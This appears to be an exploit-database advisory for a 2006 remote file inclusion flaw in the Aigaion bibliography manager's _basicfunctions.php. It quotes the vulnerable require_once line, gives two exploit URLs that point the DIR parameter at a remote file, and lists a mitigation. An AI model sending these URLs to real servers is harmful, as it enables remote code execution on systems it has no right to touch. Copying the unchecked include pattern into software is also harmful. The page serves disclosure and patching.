Web based bibliography management system

vendor:

by:

navairum

9,3

CVSS

HIGH

Inclusion of Unspecified Variable

CWE

Product Name: Web based bibliography management system

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Web based bibliography management system

The script _basicfunctions.php does not specify a value for the $DIR variable before including it. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious value for the $DIR variable. This can lead to remote code execution.

Mitigation:

Specify a value for the $DIR variable before including it.

Source

Exploit-DB raw data:

Software:Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/
script:_basicfunctions.php
author: navairum

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The script _basicfunctions.php does not specify a value for the $DIR variable before including it.
Vulnerable code:

//if this script is not called from within one of the base pages, redirect to frontpage
require_once($DIR."checkBase.php");

/* This function leads the browser to the given location */

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit:
http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt?
http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt?

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2006-11-14]